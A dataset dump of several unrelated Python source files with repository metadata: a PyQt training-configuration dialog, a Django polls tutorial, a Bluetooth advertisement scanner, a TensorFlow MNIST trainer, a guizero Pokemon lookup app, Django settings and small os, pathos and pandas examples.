self.horizontalSlider_2.setValue(90)
self.horizontalSlider_2.setObjectName("horizontalSlider_2")
self.listWidget_2 = QtWidgets.QListWidget(Dialog)
self.listWidget_2.setGeometry(QtCore.QRect(135, 375, 170, 21))
self.listWidget_2.setObjectName("listView")
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept)
self.buttonBox.rejected.connect(Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
Dialog.setStyleSheet('Font-family : Arial')
self.label.setText(_translate("Dialog", "Configuration Option"))
self.label_2.setText(_translate("Dialog", "Epoch"))
self.label_3.setText(_translate("Dialog", "Batch Size"))
self.label_4.setText(_translate("Dialog", "Learning Rate"))
self.label_5.setText(_translate("Dialog", "GPU COUNT"))
self.label_6.setText(_translate("Dialog", "CPU / GPU"))
self.label_7.setText(_translate("Dialog", "Images per GPU"))
self.label_8.setText(_translate("Dialog", "BACKBONE"))
self.label_9.setText(_translate("Dialog", "Mask opt"))
self.label_10.setText(_translate("Dialog", "Layers"))
self.label_11.setText(_translate("Dialog", "Steps per Ep"))
self.label_12.setText(_translate("Dialog", "Train/Val Ratio"))
self.checkBox.setText(_translate("Dialog", "Resnet50"))
self.checkBox_2.setText(_translate("Dialog", "Resnet101"))
self.checkBox_3.setText(_translate("Dialog", "GPU"))
self.checkBox_4.setText(_translate("Dialog", "CPU"))
self.pushButton.setText(_translate("Dialog", "On"))
class Ui_ConfigList(object):
# config _list
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(200, 281)
self.pushButton = QtWidgets.QPushButton(Form)
self.pushButton.setGeometry(QtCore.QRect(10, 10, 75, 23))
self.pushButton.setObjectName("pushButton")
self.listWidget_5 = QtWidgets.QListWidget(Form)
self.listWidget_5.setGeometry(QtCore.QRect(10, 40, 210, 240))
self.listWidget_5.setObjectName("listView_5")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
Form.setStyleSheet('font-family: Arial')
self.pushButton.setText(_translate("Form", "Config"))
class Ui_Config(object):
# fast config ctrl
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(230, 150)
self.label_5 = QtWidgets.QLabel(Form)
self.label_5.setGeometry(QtCore.QRect(10, 20, 81, 21))
self.label_5.setObjectName("label_5")
self.spinBox = QtWidgets.QSpinBox(Form)
self.spinBox.setGeometry(QtCore.QRect(150, 20, 71, 22))
self.spinBox.setObjectName("spinBox")
self.label_6 = QtWidgets.QLabel(Form)
self.label_6.setGeometry(QtCore.QRect(10, 50, 71, 21))
self.label_6.setObjectName("label_6")
self.label_7 = QtWidgets.QLabel(Form)
self.label_7.setGeometry(QtCore.QRect(10, 80, 80, 21))
self.label_7.setObjectName("label_7")
self.spinBox_2 = QtWidgets.QSpinBox(Form)
self.spinBox_2.setGeometry(QtCore.QRect(150, 50, 71, 22))
self.spinBox_2.setObjectName("spinBox_2")
self.spinBox_3 = QtWidgets.QSpinBox(Form)
self.spinBox_3.setGeometry(QtCore.QRect(150, 80, 71, 22))
self.spinBox_3.setObjectName("spinBox_3")
self.label = QtWidgets.QLabel(Form)
self.label.setGeometry(QtCore.QRect(10, 110, 81, 21))
self.label.setObjectName("label")
self.lineEdit = QtWidgets.QLineEdit(Form)
self.lineEdit.setGeometry(QtCore.QRect(140, 110, 81, 21))
self.lineEdit.setObjectName("lineEdit")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
Form.setStyleSheet('font-family : Arial')
self.label_5.setText(_translate("Form", "Epoch"))
self.label_6.setText(_translate("Form", "GPU Count"))
self.label_7.setText(_translate("Form", "Img per GPU"))
self.label.setText(_translate("Form", "Learning Rate"))
class Ui_Class(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(280, 180)
# self.pushButton_1 = QtWidgets.QPushButton(Form)
# self.pushButton_1.setGeometry(QtCore.QRect(190, 50, 81, 23))
# self.pushButton_1.setObjectName("pushButton_6")
# self.pushButton_2 = QtWidgets.QPushButton(Form)
# self.pushButton_2.setGeometry(QtCore.QRect(190, 20, 81, 23))
# self.pushButton_2.setObjectName("pushButton_2")
self.listWidget = QtWidgets.QListWidget(Form)
self.listWidget.setGeometry(QtCore.QRect(10, 50, 261, 145))
self.listWidget.setObjectName("listWidget")
# self.label = QtWidgets.QLabel(Form)
# self.label.setGeometry(QtCore.QRect(10, 40, 51, 31))
# self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(Form)
self.label_2.setGeometry(QtCore.QRect(10, 10, 91, 31))
self.label_2.setObjectName("label_2")
# self.lineEdit_2 = QtWidgets.QLineEdit(Form)
# self.lineEdit_2.setGeometry(QtCore.QRect(50, 40, 131, 31))
# self.lineEdit_2.setObjectName("lineEdit_2")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
Form.setStyleSheet('font-family : Arial')
# self.pushButton_1.setText(_translate("Form", "Add"))
# self.pushButton_2.setText(_translate("Form", "Del"))
# self.label.setText(_translate("Form", "Put in"))
self.label_2.setText(_translate("Form", "Attribute Class")) | [
"jinwoo6612@naver.com"
] | jinwoo6612@naver.com |
e06b03019bec6c707b19cfc1bdac6a5392f11eac | 98423db72fb471ba8a21e1e89a186a50c490e001 | /polls/views.py | 6e7ad747c5c31063678bbc8091fa9364efface69 | [] | no_license | IchigoMilk/django-tutorial | 9b66422e84e80ac9ae35f4501c690479663853da | b03629196b537f7834440de032cf5013589526ea | refs/heads/master | 2021-05-08T14:52:16.696499 | 2018-03-28T14:41:41 | 2018-03-28T14:41:41 | 120,100,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,670 | py | from django.shortcuts import get_object_or_404, render
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.views import generic
from django.utils import timezone
from .models import Choice, Question
class IndexView(generic.ListView):
# template_nameを指定しないと自動でapp name>/<model name>_detail.htmlになる
template_name = 'polls/index.html'
# これも自動ならquestion_listになる
context_object_name = 'latest_question_list'
def get_queryset(self):
# return the last five published questions (not including those set to be published in the future).
return Question.objects.filter(pub_date__lte=timezone.now()).order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
def get_queryset(self):
return Question.objects.filter(pub_date__lte=timezone.now())
class ResultsView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def vote(request, question_id):
question = get_object_or_404(Question, pk=question_id)
try:
selected_choice = question.choice_set.get(pk=request.POST['choice'])
except (KeyError, Choice.DoesNotExist):
# Redisplay the question voting form.
return render(request, 'polls/detail.html', {
'question': question,
'error_message': "You didn't select a choice.",
})
else:
selected_choice.votes += 1
selected_choice.save()
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))
| [
"socket65536@gmail.com"
] | socket65536@gmail.com |
cc2b9367dcb75a3613b7456a24d7379ffed94e1f | 23daf97312ea16cc399feedfa048131d564b83fa | /lib/BluenetLib/lib/core/bluetooth_delegates/AioScanner.py | 1bdc096e712664a077ca209d4d5155cfeaf19041 | [] | no_license | wickyb94/programmer | 6e2cafa3fbb9f54bfdcd24f7062f6425ebb429fc | be0f01586365a79b51af8c4da376fe216d38afba | refs/heads/master | 2022-04-09T17:52:18.106331 | 2020-03-02T15:57:02 | 2020-03-02T15:57:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,569 | py | import asyncio
import sys
import time
import aioblescan
from BluenetLib.lib.util.LogUtil import tfs
counter = 0
prev = time.time()
start = time.time()
class AioScanner:
def __init__(self, hciIndex = 0):
self.event_loop = None
self.bluetoothControl = None
self.connection = None
self.timeRequestStart = 0
self.eventReceived = False
self.hciIndex = hciIndex
self.delegate = None
self.scanRunning = False
self.scanDuration = 0
def withDelegate(self, delegate):
self.delegate = delegate
return self
def start(self, duration):
self.scanRunning = True
self.scanDuration = duration
self.scan()
def stop(self):
self.scanRunning = False
def scan(self, attempt = 0):
print(tfs(), "Attempt Scanning")
self.eventReceived = False
event_loop = asyncio.new_event_loop()
bluetoothSocket = aioblescan.create_bt_socket(self.hciIndex)
transportProcess = event_loop._create_connection_transport(bluetoothSocket, aioblescan.BLEScanRequester, None, None)
self.connection, self.bluetoothControl = event_loop.run_until_complete(transportProcess)
print(tfs(), "Connection made!")
self.bluetoothControl.process = self.parsingProcess
self.timeRequestStart = time.time()
self.bluetoothControl.send_scan_request()
print(tfs(), "Scan command sent!")
alreadyCleanedUp = False
try:
event_loop.run_until_complete(self.awaitEventSleep(1))
if not self.eventReceived:
if attempt < 10:
print(tfs(), 'Retrying... Closing event loop', attempt)
self.cleanup(event_loop)
alreadyCleanedUp = True
self.scan(attempt + 1)
return
else:
pass
event_loop.run_until_complete(self.awaitActiveSleep(self.scanDuration))
except KeyboardInterrupt:
print('keyboard interrupt')
finally:
print("")
if not alreadyCleanedUp:
print(tfs(), 'closing event loop', attempt)
self.cleanup(event_loop)
async def awaitEventSleep(self, duration):
while self.eventReceived == False and duration > 0:
await asyncio.sleep(0.05)
duration -= 0.05
async def awaitActiveSleep(self, duration):
while self.scanRunning == True and duration > 0:
await asyncio.sleep(0.05)
duration -= 0.05
def cleanup(self, event_loop):
print(tfs(), "Cleaning up")
self.bluetoothControl.stop_scan_request()
self.connection.close()
event_loop.close()
def parsingProcess(self, data):
ev=aioblescan.HCI_Event()
xx=ev.decode(data)
hasAdvertisement = self.dataParser(ev)
if hasAdvertisement and self.delegate is not None:
self.delegate.handleDiscovery(ev)
def dataParser(self, data):
#parse Data required for the scanner
advertisementReceived = False
for d in data.payload:
if isinstance(d, aioblescan.aioblescan.HCI_CC_Event):
self.checkHCI_CC_EVENT(d)
elif isinstance(d, aioblescan.Adv_Data):
advertisementReceived = self.dataParser(d) or advertisementReceived
elif isinstance(d, aioblescan.HCI_LE_Meta_Event):
advertisementReceived = self.dataParser(d) or advertisementReceived
elif isinstance(d, aioblescan.aioblescan.HCI_LEM_Adv_Report):
self.eventReceived = True
advertisementReceived = True
return advertisementReceived
def checkHCI_CC_EVENT(self, event):
for d in event.payload:
if isinstance(d, aioblescan.aioblescan.OgfOcf):
if d.ocf == b'\x0b':
print(tfs(),"Settings received")
elif d.ocf == b'\x0c':
print(tfs(), "Scan command received")
# if isinstance(d, aioblescan.aioblescan.Itself):
# print("byte", d.name)
# if isinstance(d, aioblescan.aioblescan.UIntByte):
# print("UIntByte", d.val)
def parseAdvertisement(self, decodedHciEvent):
global counter
if counter % 50 == 0:
counter = 0
print(".")
else:
sys.stdout.write(".")
counter+= 1
# decodedHciEvent.show()
| [
"alexdemulder@gmail.com"
] | alexdemulder@gmail.com |
018d4933eefaf485450890317f1174539461ccc0 | 6cb7ea40aa0327e3117f43da16a995f092eb0ddd | /TrainDigitTF2.py | c0fa447b5308cbb045928860ad4ae086238840ec | [] | no_license | VectorL1990/DigitRecognition | ff63b0c992d5d044bb81361237654d43060b43d6 | 73f93cc388461b6b0b8aa0fadbd2f07a6d3599c3 | refs/heads/master | 2023-07-17T17:34:00.089287 | 2021-09-02T09:21:20 | 2021-09-02T09:21:20 | 397,887,827 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,274 | py | import os
from MnistLoader import MnistLoader
import tensorflow as tf
from tensorflow.keras import datasets, layers, models
from PIL import Image
class CNN(object):
def constructLayers(self,
in_num_channel,
in_filter_size,
in_image_size,
in_max_pooling_size):
self.num_channel = in_num_channel
self.filter_size = in_filter_size
self.image_size = in_image_size
self.max_pooling_size = in_max_pooling_size
model = models.Sequential()
model.add(layers.Conv2D(32,
(self.filter_size, self.filter_size),
activation='relu',
input_shape=(self.image_size, self.image_size, self.num_channel)))
model.add(layers.MaxPooling2D((self.max_pooling_size, self.max_pooling_size)))
model.add(layers.Conv2D(64,
(self.filter_size, self.filter_size),
activation='relu'))
model.add(layers.MaxPooling2D((self.max_pooling_size, self.max_pooling_size)))
model.add(layers.Conv2D(64,
(self.filter_size, self.filter_size),
activation='relu'))
model.add(layers.Flatten())
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(10, activation='softmax'))
model.summary()
self.model = model
class Train(object):
def __init__(self,
in_num_channel,
in_filter_size,
in_image_size,
in_max_pooling_size):
self.cnn = CNN()
self.cnn.constructLayers(in_num_channel= in_num_channel,
in_filter_size= in_filter_size,
in_image_size= in_image_size,
in_max_pooling_size= in_max_pooling_size)
self.mnist_loader = MnistLoader(in_image_size, in_image_size, in_num_channel)
self.mnist_loader.parserMnistData('data\MNIST')
# Use keras.callbacks.ModelCheckpoint to save model trained
def train(self):
check_path = './ckpt/cp-{epoch:04d}.ckpt'
save_model_callback = tf.keras.callbacks.ModelCheckpoint(check_path,
save_weights_only = False,
verbose = 1,
period = 5)
self.cnn.model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
self.cnn.model.fit(self.mnist_loader.train_images, self.mnist_loader.train_labels,
epochs=5, callbacks=[save_model_callback])
test_loss, test_acc = self.cnn.model.evaluate(self.mnist_loader.test_images, self.mnist_loader.test_labels)
print("Accuracy is: {0}, and total amount of test images is: {1}".format(test_acc, len(self.mnist_loader.test_labels)))
if __name__ == "__main__":
train_obj = Train(1, 3, 28, 2)
train_obj.train() | [
"842175664@qq.com"
] | 842175664@qq.com |
d04df9b36f61e6f8358dcb1cc495cd63b9bc46af | 8ec2e012ccfbd15c5799bacbac6040c7df8b7c3f | /store/migrations/0004_auto_20200215_0900.py | 0f411dabe96bda5c25f76257bac7752593a310ea | [] | no_license | Rakshitmahajan/FairPrice | d5340fe19613ed235eb741e20d2b8c0139f08580 | 43f925d8a85b7158842b05a48c6bc342e2514c59 | refs/heads/master | 2023-01-07T16:59:50.833687 | 2020-03-17T13:48:28 | 2020-03-17T13:48:28 | 247,981,562 | 0 | 0 | null | 2023-01-05T10:19:02 | 2020-03-17T13:48:45 | Python | UTF-8 | Python | false | false | 1,100 | py | # Generated by Django 2.2.9 on 2020-02-15 09:00
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('store', '0003_auto_20200215_0857'),
]
operations = [
migrations.AlterField(
model_name='item',
name='company',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='item',
name='description',
field=models.CharField(blank=True, max_length=1000, null=True),
),
migrations.AlterField(
model_name='item',
name='img_url',
field=models.CharField(blank=True, max_length=1000, null=True),
),
migrations.AlterField(
model_name='item',
name='model',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='item',
name='price',
field=models.IntegerField(blank=True, null=True),
),
]
| [
"rakshitmahajan.rm@gmail.com"
] | rakshitmahajan.rm@gmail.com |
9cda5a3e8de3d78fd55239a46b1e147370b3b614 | c131f16aa7674db271ee2cab4326600af26da15c | /pokerFetcher/PokeFetcher.py | aff571a5fa087655919097c7aed44d462444045e | [] | no_license | bahmanshams/pokemon_fetcher | 8de54f15328f6327f10182a6a78c74f178c1a6b9 | 739e29f3cc36ac573affa11690d5099d50046836 | refs/heads/master | 2020-03-11T14:06:48.666008 | 2018-04-18T10:11:46 | 2018-04-18T10:11:46 | 130,044,336 | 1 | 0 | null | 2018-04-18T10:15:32 | 2018-04-18T10:15:32 | null | UTF-8 | Python | false | false | 1,462 | py | from guizero import App, TextBox, PushButton, Picture,error ,Text
from pokebase import pokemon
from requests import get
from PIL import Image
from io import BytesIO
info=''
def fetch_pokemon():
name = (input_box.value).lower()
try:
poke = pokemon(name)
info=poke.sprites
height=poke.height
weight=poke.weight
typee=poke.type
pic = get(poke.sprites.front_default).content
image = Image.open(BytesIO(pic))
image.save('poke.gif')
icon.value = 'poke.gif'
info_box.value=info
height_box.value=height
weight_box.value=weight
type_box.value=typee
except:
error('warning','invalid name, plz enetr the name properly')
app = App(title='Pokemon Fetcher', width=400, height=400, bg='#FFC300')
input_box = TextBox(app, text='Name')
icon = Picture(app, image="poke.gif")
submit = PushButton(app, command=fetch_pokemon, text='Submit')
submit.bg="#FF5733"
info_box = TextBox(app, text='', multiline=True, width=30, height=5)
weight_lbl = Text(app, text="weight", bg='#FFC300')
weight_box = TextBox(app, text='')
height_lbl = Text(app, text="height",bg='#FFC300')
height_box = TextBox(app, text='')
type_lbl = Text(app, text="type", bg='#FFC300')
type_box = TextBox(app, text='',multiline=True )
app.display()
#poke.abilities
#poke.height
#poke.name
#poke.species
#poke.stats
#poke.type
#poke.weight
| [
"sereno.project@gmail.com"
] | sereno.project@gmail.com |
86ff4bd7ce0fdafce7c4ee2da25bef83424cf597 | 2e2d813757928abeaf667e0c7b127f9b1d9bd096 | /Shutter/ShutterWeb/forms.py | 13f0afe0393a0ab9edaa747753d896308cb5bbcd | [] | no_license | lnming/PhotoShow | 977e05534b61d438d18d75ad7feb4fe38696047a | 361ede28e3c58238391db0bbacf99a6d8f75d406 | refs/heads/master | 2021-09-19T09:11:30.860909 | 2018-07-26T07:00:15 | 2018-07-26T07:00:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,272 | py | from django import forms
from .models import *
from django.contrib.auth.forms import UserCreationForm
class CommentForm(forms.ModelForm):
# content=forms.CharField(label='comment_content',max_length=500)
class Meta:
model= Topiccomment
fields = ['content', ]
class TopicForm(forms.ModelForm):
class Meta:
model= Topic
fields = ['title', 'content']
# register related
class RegisterForm(UserCreationForm):
class Meta(UserCreationForm.Meta):
model = UserProfile
fields = ("username", "email")
class photoForm(forms.ModelForm):
image = forms.ImageField(required=False)
class Meta:
model = Photo
fields = ['category', 'photo_name', 'photographer_name', 'photographer_remark', 'image']
class photocommentForm(forms.ModelForm):
class Meta:
model = PhotoComment
fields = ['content']
class messageSendForm(forms.ModelForm):
class Meta:
model = Message
fields = ['content']
class UserInfoForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ['username', 'gender', 'address', 'email']
class NewsCommentForm(forms.ModelForm):
class Meta:
model= NewsComment
fields = ['content', 'author'] | [
"dshe6519@uni.sydney.edu.au"
] | dshe6519@uni.sydney.edu.au |
56be7e66f1221a5f47d8381ede18175161375cec | 6887d8ccc93ce6706633766b35d980a27816c25b | /pustakalaywebsite/settings/base.py | a61acce18ad98887dcbdf252f36618d2385f31de | [] | no_license | pustakalay/pustakalaywebsite | cba8f99b693bc517dc1dd60ba595e703b88946de | d89a76fafc8cde5be7de139a54c4a729d4849cc9 | refs/heads/master | 2022-12-09T23:16:31.947949 | 2019-05-12T14:12:12 | 2019-05-12T14:12:12 | 172,263,237 | 0 | 0 | null | 2022-12-08T04:59:45 | 2019-02-23T20:57:22 | Python | UTF-8 | Python | false | false | 3,614 | py | """
Django settings for pustakalaywebsite project.
Generated by 'django-admin startproject' using Django 1.11.20.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
IS_SMS_SIMULATED = True
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'booksapp',
'addresses',
'analytics',
'search',
'carts',
'orders',
'accounts',
'billing',
'sms',
]
AUTH_USER_MODEL = 'accounts.User'
FORCE_SESSION_TO_ONE = False
FORCE_INACTIVE_USER_ENDSESSION= False
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = 'dev.pustakalay@gmail.com'
EMAIL_PORT = 587
EMAIL_USE_TLS = True
DEFAULT_FROM_EMAIL = 'Pustakalay Developer <dev.pustakalay@gmail.com>'
MANAGERS = (
('Pustakalay Developer', "dev.pustakalay@gmail.com"),
)
ADMINS = MANAGERS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'pustakalaywebsite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'pustakalaywebsite.wsgi.application'
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static_my_proj"),
]
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
LOGIN_URL = 'login'
LOGIN_REDIRECT_URL = 'home'
LOGOUT_REDIRECT_URL = 'home'
| [
"tanayparadkar@gmail.com"
] | tanayparadkar@gmail.com |
1b467a91e2a1c3615151e4396aca2174f89d16e1 | c9755bfa9b8270f9e179ca09c78ceca4d09673f8 | /manage.py | 06a5f98043ce9e2850f69551eb8725b8924e5f8e | [] | no_license | kenners5/my_first_app | 5d0bd9a8545c17cf82748bcb72d3f7995982181d | 606c94d09e18e4b767465448388902e5f86c4b41 | refs/heads/master | 2021-01-25T12:01:38.399809 | 2013-10-05T18:36:00 | 2013-10-05T18:36:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "django_site.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"kenners@gmail.com"
] | kenners@gmail.com |
373fc37ec392129ca342d634dee0ed7f075aff4c | d3f92b32093159ddb62822b0da166c06983846d1 | /Downloads/PycharmProjects/untitled/py/py01.py | 107c45f8b24c17c80d3126827708d7d6f7a19b79 | [] | no_license | zyall/demo | 73f4ad7f09e286df8d22b74e0d6c35ffd1884c5c | 053df3fb20040021e3da5254e148a66abf204f56 | refs/heads/temp | 2021-06-14T13:00:01.766615 | 2019-07-19T03:11:36 | 2019-07-19T03:11:36 | 197,181,715 | 0 | 0 | null | 2021-06-02T00:01:08 | 2019-07-16T11:33:18 | Python | UTF-8 | Python | false | false | 925 | py | import random,sys
name=input("输入姓名:")
n = 0
#用户输入姓名后生成1到100的随机数
target=random.randint(1,99)
print('I am thinking of a number between 1 and 100')
print(target)
#用户一共有5次猜测机会,5次没猜中游戏结束
while n < 5:
n+=1
while True:
# 按q或Q退出游戏
user_input =input("Take a guess or enter \"q\" to quit.\n")
if user_input=='q' or user_input=='Q':
sys.exit('Goodbye')
# 实现输入validation,用户输入非数字的话要求重新输入
if user_input.isdigit():
user_input=int(user_input)
break
else:
print("Invaild input")
if user_input > target:
print('your guess is too high')
elif user_input < target:
print('your guess is too low')
else:
print('Good job, the correct number is %s' %target)
sys.exit(0)
| [
"1554754887@qq.com"
] | 1554754887@qq.com |
96fd2bd857643c663092d384cf8ec78d6b61a6cf | fb0f6646b2a7972454453907fbdc656b7471f55f | /p322_module_os.py | dd9437674eb42016e5d93c9c80fd0ac56ab764e7 | [] | no_license | woojin97318/python_basic | 6497d5c85369746edfe8ca79ad7f3f47c871ee66 | 97e9a322a08f1483bf35dc03507ac36af2bf1ddb | refs/heads/master | 2023-07-15T03:06:05.716623 | 2021-08-25T03:46:48 | 2021-08-25T03:46:48 | 399,681,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 619 | py | # 모듈을 읽어 들입니다.
import os
# 기본 정보를 몇개 출력해 봅시다.
print("현재 운영체제:", os.name)
print("현재 폴더:", os.getcwd())
print("현재 폴더 내부의 요소:", os.listdir())
# 폴더를 만들고 제거합니다.[폴더가 비어있을 때만 제거 가능]
os.mkdir("hello")
os.rmdir("hello")
# 파일을 생성하고 + 파일 이름을 변경합니다.
with open("original.txt", "w") as file:
file.write("hello")
os.rename("original.txt", "new.txt")
# 파일을 제거합니다.
os.remove("new.txt")
# os.unlink("new.txt")
# 시스템 명령어
os.system("dir") | [
"woojin97318@naver.com"
] | woojin97318@naver.com |
44b780296f882a1446213f64764a325db1448200 | 850001831b1fcdd4d27e328b356fc34909ca2917 | /examples/spawn.py | 367e288dfa2b65a8b6bb4a47c0514b8b5cd14e4f | [
"BSD-3-Clause"
] | permissive | yidiq7/pathos | b337353ccfe447866c46a4a784a7908c2f3fe31e | 7e4fef911dc0283e245189df4683eea65bfd90f0 | refs/heads/master | 2022-08-24T08:43:34.009115 | 2020-05-27T12:18:21 | 2020-05-27T12:18:21 | 267,310,390 | 0 | 0 | NOASSERTION | 2020-05-27T12:14:50 | 2020-05-27T12:14:47 | null | UTF-8 | Python | false | false | 957 | py | #!/usr/bin/env python
#
# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)
# Copyright (c) 1997-2016 California Institute of Technology.
# Copyright (c) 2016-2020 The Uncertainty Quantification Foundation.
# License: 3-clause BSD. The full license text is available at:
# - https://github.com/uqfoundation/pathos/blob/master/LICENSE
"""
demonstrate pathos's spawn2 function
"""
from __future__ import print_function
from pathos.util import spawn2, _b, _str
if __name__ == '__main__':
import os
def onParent(pid, fromchild, tochild):
s = _str(fromchild.readline())
print(s, end='')
tochild.write(_b('hello son\n'))
tochild.flush()
os.wait()
def onChild(pid, fromparent, toparent):
toparent.write(_b('hello dad\n'))
toparent.flush()
s = _str(fromparent.readline())
print(s, end='')
os._exit(0)
spawn2(onParent, onChild)
# End of file
| [
"mmckerns@8bfda07e-5b16-0410-ab1d-fd04ec2748df"
] | mmckerns@8bfda07e-5b16-0410-ab1d-fd04ec2748df |
6da151561ebdbcbd2e1ef59f98ad58c5ba0e4fdd | 9b1da04d8c66b8fb429120c902e4022506a05f5a | /apc_pcl/pysrc/apc_tools/__init__.py | a4d7113fa1bb4ff799cd3927888c039cacc468a9 | [] | no_license | ehuang3/apc_ros | 49533b7c6ec9a13d45914b0c252c88c7413731a7 | 050871ec3e85c53fe1b0e4612abbbfa07db75f59 | refs/heads/master | 2021-01-10T12:30:49.700225 | 2015-05-27T03:41:20 | 2015-05-27T03:41:20 | 36,998,288 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | from .bin_segmenter import Bin_Segmenter
from .utils import *
from .misc import load_background | [
"jpanikulam@ufl.edu"
] | jpanikulam@ufl.edu |
6b0026679abeb367ca7956559f7f3c433bc6bf99 | 307d035478f602f7c780a39d65b05ce39688d61b | /trash/viz.py | e85f2e37302c261adff6c36e8b614472bd3ad8c4 | [
"MIT"
] | permissive | collectif-CAKUVA/dash-bodacc | c10c366586e0145c78a38d3880a54e849099c516 | a77c240003db2737f95bd9b6f58b8436e25724c5 | refs/heads/main | 2023-05-04T14:20:40.205142 | 2021-05-23T23:38:17 | 2021-05-23T23:38:17 | 343,438,545 | 1 | 2 | MIT | 2021-05-23T23:38:18 | 2021-03-01T14:09:18 | HTML | UTF-8 | Python | false | false | 868 | py | """
visulasation module
importing data to DF then exporting data to .html and csv.files
"""
import pandas as pd
from __main__ import s_numero_identification, s_numeroDepartement, s_date_parution, \
s_activite_insee
from api import s_ape
from funct_pool import s_activite_declaree, s_code_postal
df_final = pd.DataFrame({
'siren': s_numero_identification,
'departement': s_numeroDepartement,
'date_publication': s_date_parution,
'activite_déclarée': s_activite_declaree,
'code_ape': s_ape,
'activte_insee': s_activite_insee,
'code_postal': s_code_postal
})
df_ml = pd.DataFrame({
'activite': s_activite_declaree,
'code_ape': s_ape
})
with pd.option_context('display.max_rows', None, 'display.max_columns', None):
df_final.to_html('temp.html')
df_final.to_csv('data.csv', header = True, encoding= 'utf-8') | [
"t.valton@gmail.com"
] | t.valton@gmail.com |
